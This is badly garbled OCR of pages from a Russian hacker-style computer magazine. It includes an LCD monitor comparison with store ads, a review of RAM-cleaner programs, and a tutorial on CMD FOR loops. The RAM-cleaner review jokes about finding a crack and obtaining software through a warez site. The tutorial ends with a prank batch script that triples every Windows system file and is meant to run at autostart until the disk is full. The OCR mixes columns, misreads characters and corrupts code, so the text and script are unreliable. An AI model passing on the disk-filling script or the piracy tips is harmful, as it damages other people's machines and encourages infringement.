ведливости мы тут сильно придирались. Так что если ты не собира- 
ешься заниматься черчением на мониторе, то запариваться геометри- 
ей не нужно. 


ьлики 


Современные СЕТ-моньки покрывают антибликовой пленкой для то- 
го, чтобы лампы в твоем помещении не мешали работать. На экране 
наших лсидишек вместо стекла была матовая пленочка, которая поч- 
ти не бликует. Производители в документации очень сильно просят 
не лапать матрицу. 


УГОЛ ОБЗОРА 

(Таблица: Дизайн (2/2)) 

Когда лсидишки только появились с углами обзора, была жуткая про- 
блема. Проявлялась она так: только ты повернул монитор или голо- 
ву, как изображение изменило цвет или даже вывернулось наизнан- 
ку. Когда один сидишь за таким монитором - то это еще ничего, но 
когда вы обсуждаете какой-нибудь графический макет всем скопом... 
То есть один видит под одним углом, другой - под другим, и все в ре- 
зультате видят разные вещи. 

Так вот, в новых моделях жидкокристаллических дисплеев, которые 
мы протестили, такого просто нет. Можно даже встать позади мони- 
тора и, извернувшись, заглянуть в него. Этот древний глюк был очень 
неприятным, поэтому всем так запомнился. Но разработчики его дав- 
но пофиксили, и теперь надо обращать внимание на другие вещи. 

У всех мониторов, которые мы тестили, параметры по углу обзора 
одинаковые, практически идеальные. Однако отличия от электрон- 
нолучевых есть! Экран лсидишника переливается! Даже если ты си- 
дишь по центру и нос к носу с монькой. Особенно это заметно при 
работе с текстом. Чуть повернул голову, и буковки стали отливать 


Таблица: Читаемость текста в разных разрешениях. 


1152X854 1280X768 1280X1024 
читается (с ухудшениями) He читается(размыто) читается (четко) 
читается не читается(размыто) читается (четко) 
читается читается читается (четко) 
читается не читается(размыто) читается (четко) 
читается(очень мутно) — не читается(размыто) читается (четко) 
читается (мутновато) не читается(размыто) читается (четко) 
читается не читается(размыто) — читается (четко) 
читается не читается(размыто) читается (четко) 
читается не читается(размыто) читается (четко) 


читается (четко) читается (четко) читается (четко) 


дизайн 
стильный, эргономичный 
стильный, эргономичный 
прикольный 


поворот (градусов) 
Sony SDM-S71 HeT 
Sony SDM-S81 HeT 
Sony SDM-N80 45 (влево/право) 


ТЕСТИРОВАНИЕ 17-18” LCD-MOHUTOPOB 


Таблица: Дизайн (1/2) 


RoverScan Maxima Pro HeT растет из стола 
Scott LC-17BL HeT классический 
LG Flatron 782LE 30 (влево/вправо) керпичь 

NEC MultiSync LCD1700V HeT классический 


ПУАМА AS4316UTC нет 
Samsung 171p 90 (страница/альбом) 
Samsung 172t HeT 


прикольный 


другим цветом. Чувствуешь, что что-то не так, и не можешь понять, 
в чем дело. На самом деле это совсем не вредит четкости изображе- 
ния и цветопередаче. Просто надо привыкнуть к этим необычным 
еле заметным переливам. 


КОНСТРУКЦИЯ 
БЛОК ПИТАНИЯ 


(Таблица: Дизайн (1/2)) 

Почти для всех мониторов блоки питания были внешними. Это ужас- 
но неудобно. От розетки к блоку питания (маленькой коробочке) 
идет толстый шнур и от коробочки к монитору - тонкий. В результа- 
те имеем клубок проводов и коробочку на столе, которая постоянно 
подмигивает нам светодиодом и греется. 


СТЕПЕНИ СВОБОДЫ 

(Таблица: Дизайн (1/2)) 

Приятно, когда монитор на ножке. И неудобно, когда он растет из сто- 
ла как RoverScan Maxima pro! А еще приятнее, когда монитор умеет 
крутиться. То есть монитор можно легко развернуть на подставке вле- 
во/вправо, а не только вверх/вниз. Это только кажется, что поставил 
моньку и не трогаешь. На самом деле постоянно приходится его дер- 
гать. Уселся на стуле по-другому, чтобы спина не затекала, - прихо- 
дится менять положение монитора. 


АНАЛОГОВЫЙ И ЦИФРОВОЙ 
ВИДЕОИНТЕРФЕИС 


(Таблица: Дизайн (2/2)) 

У некоторых наших мониторов было по два разъема. Можно было 
подключить монитор через аналоговый интерфейс, а можно и через 
цифровой. Зачем нужен цифровой интерфейс в мониторе, спросишь 
ты. А все дело в том, что СВТ-мониторы по своей сути аналоговые ус- 
тройства. То есть положение точки на экране (зайчика от электронно- 
го луча) управляется напряжением. А LCD-monutop больше похож Ha 
массив видеопамяти, там каждый пиксель свой адрес имеет. 


Поскольку все адаптеры были сделаны под СЕТ-мониторы, то LCD 
пришлось приспосабливаться. Бедной жидкокристаллической 30- 
лушке приходится по аналоговому видеосигналу определять адрес 
ячейки в своей матрице. Компьютер, заметь, тоже цифровой, и ему 
бы проще адрес передать напрямую, а он его в аналоговый сигнал 
преобразует. Из-за такого двойного преобразования адрес-сигнал, 
сигнал-адрес Ha LCD появляются все эти размытости и прочий бред 
на плохом адаптере. 


Таблица: Дизайн (2/2) 


угол.обзора вход мощность 
гор. верт. 
Sony SDM-S71 140 120 аналог 45 В 
Sony SDM-S81 160 160 аналог 50 В 
Sony SDM-N80 140 110 — аналог/цифра 67Вт 


RoverScan Maxima Pro 150 140 — аналог/цифра 608 
Scott LC-17BL 150 140 аналог 40 В 
LG Flatron 782LE 150 140 = аналог/цифра 55B 
NEC MultiSync LCD1700V 140 125 аналог 54 Вт 
ПУАМА AS4316UTC 150 140 аналог/цифра 50B 
Samsung 171p 170 170 — аналог/цифра 40В 
Samsung 172% 170 170 = аналог/цифра 40В 


от тех, кто делает Porshe 
стильный, эргономичный 


менюшка колонки блок питания 
простая, удобная нет внешний 
простая, удобная нет внешний 
простая, удобная, высокого качества внешний, 
светится навороченный 
простая, удобная пищалки внешний 
простая, удобная пищалки внешний 
простая, удобная пищалки внутренний 
простая, удобная нет внешний 
гиморная высокого качества внешний 
простая, удобная, светится высокого качества внешний 
простая, удобная, русская нет внешний 


ПРАВИЛА РАСПРЕДЕЛЕНИЯ НАГРАД 

По правилам нашей тестовой лаборатории всего су- 
ществует пять наград: две опциональные («our 
choice» и «best buy») и три обязательные (первое 
место, второе место и третье место). 

Our choice (наш выбор) - мы сами предпочли бы 
пользоваться этим устройством. 

Best buy (лучшая покупка) - устройство обладает 
оптимальным соотношением цена/качество. Причем 
при тестировании разных типов устройств один из 
этих двух показателей может перевешивать. Напри- 
мер, при тестировании мониторов большей весомо- 
стью обладает показатель «качество», так как мо- 
нитор чаще всего покупают один раз и надолго, при 
этом апгрейд его маловероятен и затруднителен - 
лучше сразу взять качественный монитор, пусть и 
дорогой. А при тестировании, скажем, процессоров, 
большей весомостью обладает показатель «цена», 
так как процессор всегда можно проапгрейдить, а в 
системах с процессорами, стоимость которых близ- 
ка, общая производительность часто одинакова или 
незначительно различна, но с разницей, незамет- 
ной для пользователя. 

Если одно из устройств получает опциональную на- 
Граду, оно автоматически исключается из претен- 
дентов на первое, второе и третье места - вне кон- 
курса. 

Кроме наград существуют опциональные флажки 
«honor» (наши симпатии) и «dishonor» (наши анти- 
патии), которыми мы награждаем устройства вне за- 
висимости от того, какое место они заняли во время 
тестирования и какие еще награды получили. 


Вывод по входам: 

Бери монитор с цифровым входом и адаптер к нему с цифровым вы- 
ходом. Проще будет с разными глюками. Хотя при понижении разре- 
шения размытости будут все равно. 


МУЛЬТИМЕДИА 

(Таблица: Дизайн (2/2)) 

Не знаю, кто придумал запихивать в [С)-дисплеи колонки и для чего. 
Наверное, для того, чтобы мы в тестовой лаборатории гамались в тре- 
тью Кваку круглые сутки со звуком. LCD-MoHUTOp очень маленький и 
плоский, это на самом деле СЕТ-монитор, который нажрался гербо- 
лайфа и похудел. Места на столе занимает мало. Так что влезут нор- 
мальные колонки. Зачем встроенные? 


раде 061 


Ч Mopagosano: \ 
KO H K Р ЕТН Е Е П О М ОД ЕЛ Я М Восемнадцатидюймовый экран круче семнадцатидюймового. Отлич- 
но справляется с фоткой, сыпь почти не видна. Справляется, в отли- 
une от собрата SDM-S71, почти со всеми разрешениями. Текст читает- 
ся, но чуточку замылен. Запаздывания текста почти не видно. Игруш- 
ки играются :). 


Расстроило: 

Геометрия не идеальна. По углам небольшие пузыри, их видно только 
на тестовой сетке NokiaTest. Но пусть это тебя не волнует, так как та- 
кие мелочи разглядит только профессионал. 


Рекомендуем: 
Для работы с фото и чертежами тем, кто не особо придирчив к геоме- 
трии. Для работы с текстами, для геймления. 


Sony SDM-N8O (3 место) 


sony SDM-S7 1 


Порадовало: 

Монитор здорово справился с фоткой, противной сыпи почти не вид- 
но, а еще монитор очень яркий. Можно поставить яркость так, что 
ГЛаза слепит. Геометрия практически идеальная. В игрушки играется 
отлично. Запаздывания матрицы практически не видно. 


Расстроило: 
Нашли один дефектный пиксель голубого цвета посредине экрана. 
Текст читается только на любимом максимальном разрешение мони- 
тора. На остальных разрешениях текст становится мутным, выпадают 
кусочки букв. 


Порадовало: 


Рекомендуем: С фотографиями и разрешениями все отлично. 
Монитор подойдет всем, кто собирается чертить в кадовских про- Задержка матрицы маленькая. Умеет крутиться 
граммах и много работать с фотками. Тем, кто хочет поиграть, тоже влево-вправо, но туговат. Умеет превращаться 
подойдет. Тем, кто хочет работать с текстом, лучше посмотреть другие в стол, его можно развернуть параллельно сто- 
модели. лу. Удивило отличное звучание колонок. У это- 
го монитора отдельный блок стильного дизайна, туда втыкают пита- 
So Ny SDM-S81 ло, звук и видео, a уже OT этого блока идет все по одному шнуру к мо- 


нитору. Блок очень удобный, с кнопочкой выключения и переключа- 
телем цифровой/аналоговый видеовход. Минус в том, что он большой 
и занимает много места на столе. 


Расстроило: 
Опять же небольшие пузыри по углам на тестовой сетке. Больше ни- 
чего не расстроило. 


Рекомендуем: 

Любителям стильных, красивых вещей. Любителям поиграться со 
встроенными колонками. Для черчения и фото лицам, не особо при- 
дирчивым к геометрии. Для работы с текстом. 


RoverScan Maxima Pro 


Порадовало: 

Геометрия почти идеальна. Запаздывание есть, не напрягает. Спра- 
вился почти со всеми разрешениями. С фоткой справляется нормаль- 
но. Очень компактный. Есть цифровой вход, что, как уже говорилось, 
очень удобно. Игры гамятся -). 


Расстроило: 

Растет из стола, ножки практически нет. Поэтому неочень удобно ме- 
HATb положение экрана и двигать монитор. Колонки неважные. Пи- 
щат! 
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У HAC 
НАМ 3 TOA ПОСТОЯННЫХ ПОКУПАТЕЛЕЙ 


Рекомендуем: 
Любителям компактных мониторов для рабо- 
ты с черчением. Смотреть фотки, работать с 
текстом, играться в игры тоже подойдет. 


Scott LC-17BL (dishonor) 


* - цена для американск nv версии 


ЗАКАЗЫ МОЖНО СДЕЛАТЬ С 10.00 до 21.00 БЕЗ ВЫХОДНЫХ ПО ТЕЛЕФОНУ 


meee 


1 


$87.95 / 79.99* 
$87.95 / 79.95* 
$69.99/85.95* 

$87.95 / 83.99* 


Blood Wake Crash Bandicoot: James Bond 007: Jet Set Radio Future 
The Wrath Of Cortex Agent Under Fire 


$87.95 / 83.99* 
$87.95 / 79.95* 
$87.95 / 83.99* 
$69.99/83.95* 


Порадовало: 
Кое-как справился с разрешениями. Геомет- 
рия с сильными искажениями, но все же луч- 
ше, чем у CRT. 


RalliSport Challenge The Dead or FIFA World 
(RSC) Alive 3 Cup 2002 


Расстроило: 

Темноватый и мутноватый, это видно даже на играх! Задержка ги- 
гантская, при прокрутке текста смазывается вся страничка. Но в иг- 
рах задержка не ощущается. Воткнуть штекер питания просто нере- 
ально. Как же надо извернуться, чтобы подключить его между под- 
ставкой и рожей монитора внизу, та же проблема с аудиокабелем для 
колонок. Колонки, кстати, неважные. 


$87.95 / 79.99* 
$87.95 / 79.95* 
$87.95 / 83.99* 
$87.95 / 83.99* 


Oddworld: Munch's Tony Hawk's Pro Wreckless: The 
Odyssey Skater 3 Yakuza Mission 


АА 


Мы принимаем заказы на любые игры формата NTSC(US)! 


Рекомендуем: 
Подойдет не очень требовательным любителям LCD дисплеев, кото- 


рые не собираются играться и работать с графикой. Которые не очень 
резко скрулят текст. 


LG Flatron 782LE 
(1 место) 


Расстроило: 
Геометрия почти идеальная, только ле- 
вый край был искажен почему-то силь- 
нее правого. 


Рекомендуем: 

Рекомендуем пользователям со средни- 
MU потребностями, которые любят поиг- 
раться, но могут заняться на досуге тек- 
стом, фото и черчением. 


ИУАМА AS4316UTC 


Порадовало: (2 место + honor) 


Геометрия почти идеальная, задерж- 
ка матрицы почти незаметна, с фото 
справляется отлично! Умеет повора- 
чиваться на ножке влево/вправо. 
Имеет цифровой вход, справляется 
почти со всеми разрешениями. Ока- 
зался единственным монитором со 
встроенным блоком питания. Это 
ужасно удобно! Все шнурки подклю- 
чаются прямо к монитору. Минусы в 
том, что он тяжелый, греется, и если включить без сетевого фильтра, 
по экрану бегут помехи. У нас ведь много умельцев, которые любят 
подключить к сети древнюю дрель или пылесос. Мы это все видим на 
мониторе. Особенно приятно, когда рабочие варят трубы электро- 
сваркой! 


Расстроило: 
Колонки пищательные. 


Рекомендуем: 

Любителям качественных мониторов для комфортной работы с чер- 
тежами, фото и текстами. Рекомендуем тем, кто не любит лишних 
блоков питания и проводов на столе. 


NEC MultiSync LCD1/700V 


Порадовало: 
Хорошо справляется почти со всеми разрешениями, нормально Порадовало: 
справляется с фото. Инертность матрицы заметна, но не мешает. Иг- Геометрия почти идеальная, с разрешения- 


ми справляется неплохо. С фоткой справля- 


рушки играются -). 
ется нормально. Имеет классный дизайн, 
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встроенные колонки играют очень даже ничего. В игрушки играет- 
ся великолепно. 


Расстроило: 
Менюшка неудобная. Постоянно путались в кнопках. 


Рекомендуем: 
Любителям СТИЛЬНЫХ вещей, которые работают с чертежами и текс- 


том. Тем, кто хочет нормального звука от встроенных колонок. 


Samsung 1У1р 
(our choice) 


Порадовало: 

Почти идеальная геометрия, низкая задержка матрицы, с фоткой 
справляется великолепно. Отличные колонки. 

Но самое главное, он умеет превращаться из альбомного листа в 
книжный. Вообще, со всеми мониторами происходит жуткая неспра- 
ведливость, потому что они лежат на боку. То есть все мониторы по- 
казывают нам альбомный лист. А большинство фотографий имеют 
больший размер по вертикали. Получается, что ты можешь видеть 
либо верх фотки, либо низ. А вокруг дофига свободного места, кото- 
рое можно использовать. Потом все тексты печатают на вертикаль- 
ном листе А4, а обычный монитор показывает горизонтальный лист! 
НЕУДОБНО! 

Samsung 171р позволяет увидеть лист А4 целиком во весь экран, при 
этом он крупный и нет лишних белых полей. Мечта любого студен- 
та, который пишет рефераты, и верстальщика, который клеит журна- 
лы. А насколько удобнее лазать по Интернету! Ведь все странички, 
как ты заметил, уходят вниз, а не в бок. Тебе постоянно приходится 
скрулить, чтобы что-то найти, зато по бокам ненужные свободные 
поля. На 171р ты можешь не скрулить, а окинуть страничку взгля- 
дом. Ну и, конечно, можно рассмотреть голую тетку целиком и круп- 
но, а не скрулить ее снизу вверх. Причем, если ты столкнулся с фот- 
кой, которая имеет больший размер по горизонтали, одним движени- 
ем поворачиваешь монитор в нормальное положение и смотришь 


нормально. 


Рекомендуем: 

Тестовая лаборатория взяла бы этот монитор себе! Очень удобно пи- 
сать на нем тексты, лазать по Интернету, просматривать бесконечные 
таблицы со спецификацией и, конечно, играться. С черчением и фот- 
ками тоже все классно. 


ТЕСТИРОВАНИЕ 17-18” LCD-MOHUTOPOB 


Samsung 172t 
(best buy) 


Порадовало: 

Единственный монитор, который на 
всех разрешениях показал абсолютно 
четкий текст. Для покупки это, навер- 
ное, главный параметр. С фоткой рабо- 
тает превосходно. Еще очень важно, что 
этот монитор можно повесить на стенку 
и освободить место на столе. Причем 
монитор вешается на стенку вмести с ножкой. Это очень удобно, по- 
тому что можно менять угол наклона LCD панели, когда монитор ви- 
сит на стене. 


Рекомендуем: 

Этот монитор лучше всего брать себе. Поскольку у него нет проблем 
с разрешениями вообще. Советуем тем, кто хочет идеальной фокуси- 
ровки при любом разрешении и никаких размытостей и глюков. По- 
дойдет любителю стильного дизайна, который профессионально ра- 


ботает с чертежами, текстами, фото и, конечно, любит поиграться. 
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Карен Казарьян aka Kirion (kirion@winfo.org) 
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Эх, где же эти дни, когда я с радостью слушал продвинутых 
товарищей, удивлялся всем новым фичам, избавлялся от — 
ламерских заблуждений... Ностальгия, понимаешь :). Дык вот, 
однажды ко мне пришел знакомый и принес новую прогу: 


| = 


—_ 


«Зашибись, прикинь, она память чистит!». 


Далее последовал резонный вопрос: 
от чего же она ее чистит? Ответом бы- 
ло что-то вроде: «Ну... от мусора раз- 
ного... типа... в общем...» :). Меня это 
как-то не устроило, и я стал рыть инфу. 
Получив еще пяток похожих объясне- 
ний от друзей и пару десятков в Инете, 
я уж было сдался, но попался один чел, 
который начал рассказывать что-то 
про dil и выделение памяти (именно так 
я и сдружился с Киром :) - прим. Дро- 
нича). С него все и началось. Прошло 
время, пришел опыт и понимание, хотя 
полной ясности нет до сих пор. Ноя Ha- 
деюсь, что эта статья будет тебе по- 
лезна, даже если ты давно пользуешь- 
ся прогами-чистильщиками. Ну что ж, 
взяли в руки сковородку, хорошенько 
прицелились по голове... процесс очи- 
стки памяти начался :). 


ТАРАКАНЫ В ГОЛОВЕ 

Почему же забивается память? Причин 
на самом деле несколько, и все они 
имеют разную значимость. @!ки, на- 
пример, действительно занимают мно- 
го оперативки. И сделано это вроде как 


ти. Это делается для того, чтобы уско- 
рить повторный запуск программы. На 
самом деле, это достаточно хороший 
механизм, если постоянно выгружать 
все неиспользуемые dil, скорость ра- 
боты заметно уменьшится. Зато памя- 
ти будет много :). Так что тут необхо- 
дим критерий, по которому они будут 
выгружаться, например, частота или 
время последнего использования. 

Другая причина - кривые руки програм- 
мистов. Любой кодер знает: освобож- 
дение занимаемой памяти и уничтоже- 
ние созданных объектов - это «хороший 
тон» в программировании. Конечно, 
винда сама должна освобождать выде- 
ленную программам память, но... му- 
сор все равно остается. Угадай, высво- 
бодится ли память, если программа 
была завершена аварийно (aka вылете- 
ла)? Вот и ятак думаю... Не забудь о бу- 
фере обмена, он тоже занимает место 
в оперативе. А еще кэш. Несмотря на 
всю полезность, он тоже может заби- 
вать память (только при динамическом 
распределении). А теперь самое глав- 
ное. Ты знаешь, почему фрагментиру- 


Hak же нам увеличить количество свободной памяти? Я знаю два приемлемых 
способа. Первый: съездить на “Савеловский” и прикупить пару модулей [Благо 


память опять подешевела]. Я так и сделаю, когда мне заплатят за эту статью al 


на благо юзера: часть функций про- 
граммы оформляется в виде библиоте- 
ки dll, тогда сама программа служит 
как бы оболочкой для вызова этих 
функций. Так повышается быстродей- 
ствие, особенно когда несколько про- 
грамм используют одну и ту же библи- 
oTeky. После закрытия программы 
!’ки еще какое-то время висят в памя- 


IB Fragmented files 


ется диск? Правильно, потому что 3a- 
пись идет в первое попавшееся место. 
И своп (который еще называют вирту- 
альной памятью) тоже фрагментирует- 
ся, потому что части из памяти выгру- 
жаются в'него как попало. Понял глав- 
ную беду? Оперативка тоже фрагмен- 
тируется! На скорость это влияет от- 
нюдь не положительно. Ну что, давай 


—= 


и 


найдем помощников в нашей пла 
ной борьбе за свободу памяти! 


СКОВОРОДКИ И ПРОЧИЕ ТЯЖЕЛЫЕ м м 
ПРЕДМЕТЫ , к 

Как же нам увеличить количество сво- 

бодной памяти? Я знаю два приемлемых 

способа. Первый: съездить на «CaBe- ь 
ловский» и прикупить пару модулей 

(благо память опять подешевела). Вто- 

рой: найти хорошую программу для и 

стки памяти. Даже не знаю, что сложнее. 

С одной стороны, таких программ очень 
много, так что найти их легко. А с другой 


гда, а остальные я скачивал м 
дом тыка. Половину пришлось» 
отмести сразу, как нерабочие 
вообще или нерабочие в 
2К/ХР. Кое-что осталось, хотя 
к концу тестирования у меня 
рябило в глазах от различных 
ram memory. free turbo ultimate 


olan: pro :). 
a 


Начнем, пожалуй... с моего лю- 
бимого Cacheman (www.out 
ertech.com). Блок по очистке па- 
MST тут весьма серьезный, сущест- ^ 
вует весьма приятный график 
ческое освобождение, двухэта BO 
бождение. Можно настроить выгрузку all, 
использование памяти в стиле win95 aka 
«conservative swap file usage» (не сове- 
тую). Весьма полезным будет установить 
флажки «do not recover on high cpu usage» 
И «do not recover on high disk activity», как 
говорится, в хелпе «this feature is strongly 
recommended», и они правы. Небольшое 
отступление: во время очистки памяти 
система жутко тормозит. Так что хоро- 
шенько подумай с настройками. Возмож- 
но, втвоем ‘случае будет лучше отключить 
автоматику и освобождать память ручка- 


MB contiguous files [Ш systemfiles (] Free space [1] Paging File C1 Dire 
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ми. Некоторыеная® 
тройки 
олько из ш!-файла, 
почитай мануал. В це- 


На очереди: 
=) Ram ldle professional 
ww.tweaknow.com). —__ 
Очень качественная №. 
прога, много настроек, _ 
| есть функция автоматй- 
ческой очистки и до- 
ступный график. Можно 
задать три значения, ко- 
торые будут использо- 
ваться при ручной очи- 
стке (вот за это я и люблю 
RIP - прим. Дронича). При- 
сутствуют также Startup-me- 
^^ нелжер и кое-какие системные 
настройки. Стоит отметить удобный 
значок в трее (показывает, сколько па- 
мяти свободно) и менюшку, которая 
вылезает по клику на него. У проги 
есть очень интересная функция: со- 
здание спецярлыков - с них проги бу- 
дут запускаться с заданным приорите- 
том, а перед запуском будет освобож- 
даться некоторое количество памяти. 
Пригодится для ресурсоемких прило- 
жений. В целом - очень хорошая про- 


3, lle, 


га, советую обратить внимание, если, 
конечно, найдешь кряк :) (на крайняк 
здорово спасает Sign Of Misery, npo- 
CuTb y Эша). 


Эти две проги входили в мою коллек- 
цию. Посмотрим, что еще нам может 
предложить Инет. Ram defrag (win- 
shell.go.ru) - достаточно быстрая про- 
грамма, но полное отсутствие настро- 
eK, как и автоматики, заставляет обра- 


доступны 9 


лом - очень качествен- | 
но, да и глазу приятно. ty 
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ЛЮБОЙ программер знает: 
освобождение занимаемой памяти, 
уничтожение созданных овъектов - 
это то, что называется “нороший тон“ 
в программировании. 


| Пржиши | Башни. | | шефа Пан 


| 
| 
| 
| 


1, Моя любимая прога === 
2, Профессиональная очистка. .. 
платить здесь точно не за что... 
4, Старый конь... 


тить взор на более качественные про- 
дукты. Единственный плюс - поддер- 
живает кое-какие ключи, например, «- 
silent» для запуска в фоновом режиме. 
Далее: Winram turbo 
(winramturbo.com). Программа суще- 
ствует в нескольких версиях, отличаю- 
щихся функциональностью и суммой 
оплаты. Я рассматривал версию Pro, а 
оплатил в самом удобном электронном 
магазине - Асталависте :). Вроде все 


А ies Reserved system space 
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есть - и настройки, и график, даже Task 
пападег присобачили, но... Мне не по- 
нравился интерфейс, да и со своей ос- 
новной функцией прога справляется не 
очень... Платить здесь точно не за что. 


Бродя по Инету, я вспомнил про 
Memturbo (www.memturbo.com). 
Довольно давно я ее использовал, HO 
потом переключился на другие продук- 
ты. Зайдя на сайт, я обнаружил, что за 
этот год программа так и не обнови- 
лась, впрочем, посмотреть ее все рав- 
но стоит. Присутствуют все необходи- 
мые настройки, автоматика, график. 
Но главное, что отличает эту прогу, - 
режим «Scrub ВАМ». Это многократный 
проход по памяти (вроде 4 раза) с це- 
лью максимально возможного осво- 
бождения. Еще интересен значок в 
трее. Он поразительно похож на своего 
собрата в Ram idle. Может, просто сов- 
падение $)... В итоге имеем неплохую 
прогу, но все-таки староватую. 


И напоследок - мегапрога Clearmem (я 
брал на www.xp-erience.org). Фишка в 
том, что она консольная! Всю память 
она выгружает в своп и потом раскла- 
дывает по полочкам. Соответственно, 
своп должен быть не меньше оператив- 
ки, ато не заработает. Прога очень ста- 
рая, сделана была Microsoft специаль- 
но для МТ. В целом - фигня :). Но для 
общего развития посмотреть стоит. 


ТЫ УЖЕ ОЧНУЛАСЬ? 

Я рассмотрел только малую часть 
подобных прог, если ты знаешь еще 
какую-нибудь достойную - пиши. Но 
я сомневаюсь, что найдется что-ли- 
бо лучше Cacheman и Ram idle. Со- 
ветую делать выбор между ними. И 
помни - самая тяжелая сковородка 


не всегда самая лучшая No ри 
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CMD - rulezzZzz 
FORever! 


В x ›}юндель сотовар , | 


Если кто-то еще не воткнул, сообщаю: 
сегодня мы мучаем святую святых CMD - 
циклы РОВ. Прошлый раз я уже приме- 
нил навороченную конструкцию РОР’а, 
теперь же мы будем разбирать его и его 
родственников гораздо подробнее. За- 
чем? Циклами делается большинство 
операций с файлами, ведь перебирать 
их руками - сущий кошмар. А работа с 
файлом - основное назначение батни- 
ков. Убедил? Будем считать, что да :). 


Итак, основная конструкция выглядит 
следующим образом: 


РОВ %%i IN (*.txt) DO command %%i 

%%i - это переменная цикла, в нее по 
очереди подставляются значения из на- 
бора, указанного после IN. В наборе 
простого цикла содержится маска или 
список имен файлов, для каждого из ко- 
торых выполняется некоторая команда. 
Чтобы команда взаимодействовала с 
файлом, необходимо прописать пере- 
менную на место параметра команды, 
отвечающего за файл (в основном этот 
параметр первый). Простенький при- 
мер: откроем все СМО-файлы в текущей 
директории для правки в новом окне. 


РОВ %%i IN (.\*.cmd) 

DO start edit.com %%i 

Таким простейшим циклом уже можно 
выполнять тучу полезных вещей, но мы 
пойдем дальше - в М$ для нас придума- 
ли циклы с параметрами. Поглядим на 
них по порядку. 


РОВ /D %% IN (win*) DO command 
%9%1 

Этот цикл будет выполнять команды для 
директорий, a не для файлов, соответст- 
венно после IN указывается список ди- 
ректорий (в этом примере - все, начина- 
ющиеся с WIN). 


FOR /R C:\WINNT\ %%i IN 
(win*) 
DO command %%i 


Такой цикл будет искать : : i ; . - © — jl 
файлы, начинающиеся Ci р | : 
WIN во всех подкаталогах : 
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C:\WINNT\, и выполнять команду для 
каждого из них. 


FOR /L %%i IN (6,1,10) 

DO command %%i 

При составлении отчетов для вывода Ha 
экран или генерации файлов этот цикл 
незаменим. В нашем примере перемен- 
ная %% будет принимать значения от 
тройки до десятки с шагом в единицу (6, 
7, 8, 9, 10). Шаг, кстати, легко может 
быть отрицательным, равно как и оба 
значения - начальное и конечное. Прав- 
да, пригодится вряд ли ;). 


FOR /F [«параметры»] %%i IN ([спи- 
сок файлов] unu_ [«ctpoka»] или 

[‘команда’]) DO.command %%i 
Самый страшный и самый функцио- 
нальный цикл”:;). Он открывает 
файлы, обрабатывает в них 


строки с заданными параметрами и вы- 
полняет команду для слов из каждой 
подходящей строки (по дефолту словом 
считаются символы, отделенные от ос- 
татка строки пробелами или табуляци- 
ей). Его мы применяли в прошлый раз, 
сегодня же рассмотрим во всей красе. 


Ты, видимо, уже заметил, что вместо 
обычной маски в IN’e этого цикла стоят 
ажтри параметрана выбор. Список фай- 
лов - они в Африке:список файлов, а вот 
«строка»-и/“команда’. - BELLI ANA нас но- 
вые: Если:параметр Ра указан в двой- 
ных кавычках, система не интерпретиру- 
ет его как/список файлов или маску, а 
ищет слова прямо’в-нем. Если же пара- 
метр стоит.в одинарных кавычках - он 
воспринимается:как команда, и слова 
ищутся в-строках, выведенных этой KO- 
мандой' на .экран»(если помнишь, про- 

шлый pas мыгибспользовали dir для 

получения имен'директорий). 


В/списке:параметров' указыва- 
ются правила‘обработки стро- 
ки. Если не указывать пара- 
метров‘вообще, цикл загре- 
бет из.каждой строки каж- 
дого-файла только первое 
слово. Если это тебя не 
устраивает, можно 
прописать следующие 
правила отделения 
строк: 


eol=; 
задает символ конца 
строки (после которого ос- 
таток строки пропускается), в 
нашем случае - «;». 


skip=7 

число строк от начала файла, ко- 
торые надо пропустить, у нас - 7 
штук. 


delims= , 

задает символы, считающиеся 
разделителями слов, взамен 
пробела и таба, мы оставляем 
пробел и запятую. 


tokens=1,3,6-8 

жуткий параметр - задает 
слова для обработки, в на- 
шем случае для каждой 
строки на обработку пойдут 
первое и третье, а также с 
шестого по восьмое. Если 
в конце параметра поста- 
вить «*» (tokens=1,3,5*), то 
слова будут обрабаты- 
ваться с последнего ука- 
занного (5) и до конца. 
Самое главное - для каж- 
дого из слов строки вы- 
деляется отдельная пе- 
ременная. То есть если 
первое слово задано 
как %%i, все последу- 
ющие будут называть- 
ся %%], %%К, %94 и 
так далее по возрас- 
танию алфавита. Не- 
трудно посчитать, 
что максимальное 
количество слов в 
строке - 52 (два ал- 

фавита: a-z, A-Z). 


FORever! 


usebackq 

меняет смысл кавычек - апострофы OK- 
ружают команду, одинарные кавычки - 
строку, а двойные - набор файлов. 


Давай замутим какой-нибудь пример, 
устраивающий сладкую жизнь нашим 
врагам. Создадим для каждого файла из 
C:\WINNT\ три дубля с расширением 
LOH, ВАК и LAN :) в папке 
C:\WINNT\BACKUP\. Поднапряжем, так 
сказать, NTFS’ky :). 


@echo off 
pushd C:\WINNT\ 


тет Этой командой мы сохранили текущую 
директорию и перешли в C:\WINNT\. 


echo loh > tmp.tmp 
echo bak >> tmp.tmp 
echo lan >> tmp.tmp 


rem Скидываем во временный файл три 
гадких расширения. 


for %%а in (*.*) do call :makebadthing 
hoa 


rem Тело цикла - для всех файлов вызываем 
подпроцедуру makebadthing с параметром 
«полное имя файла». 


del tmp.tmp >NUL 


popd 
goto :eof 


rem Конец :). Удаляем временный файл, воз- 
вращаемся в стартовый каталог. 


:makebadthing 

for /f %%b in (tmp.tmp) do copy %1 
C:\WINNT\BACKUP\%~n1.%%b 

goto :eof 


rem Содержание процедуры: для каждой 
строки файла tmp.tmp выполняем такую ко- 
манду: 

«скопировать переданный параметр (%1 ака 
%%а) в файл C:\WINNT\BACKUP\[uma старо- 
го файла]. [переменная цикла]». То есть имя 
нового файла складывается из имени старо- 
го (%-п1) и выбранного из файла расшире- 
ния (%%b). Все :). 


Вроде небольшое хулиганство, а счас- 
тья - полные штаны. Если прописать та- 
кой батник в автозагрузку, то через пару 
дней места на диске с виндами не будет 
вообще :). На сегодня все. В следующий 
раз мы будем мучить ассоциации фай- 
лов и ключи реестра. Пожелания по 
дальнейшему развитию рубрики прини- 
маются на дроничсобакареалточкаха- 
керточкару :). 


ЗЫ Command Extentions по дефолту 
включены далеко не везде, так что если 
ты хочешь использовать возможности 
СМО-интерфейса по полной програм- 
ме, придется его включить :). Делается 
это тремя способами: 

ввести в командной строке CMD /Х; 
присвоить значению ключа HKEY_CUR- 
RENT_USER\Software\Microsoft\Comma 
nd Processor\EnableExtensions единицу; 
первой (или второй, после @echo off) 
строкой батника ввести SETLOCAL 
ENABLEEXTENSIONS. 

Выбирай Ha вкус :). 


=r 
т 
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БИТВА ГИГАНТОВ: 
АТАКА КЛОНОВ 


Много ты 


сожалению, ее нетак много, как хо- 

телось бы, но достаточно, чтобы 

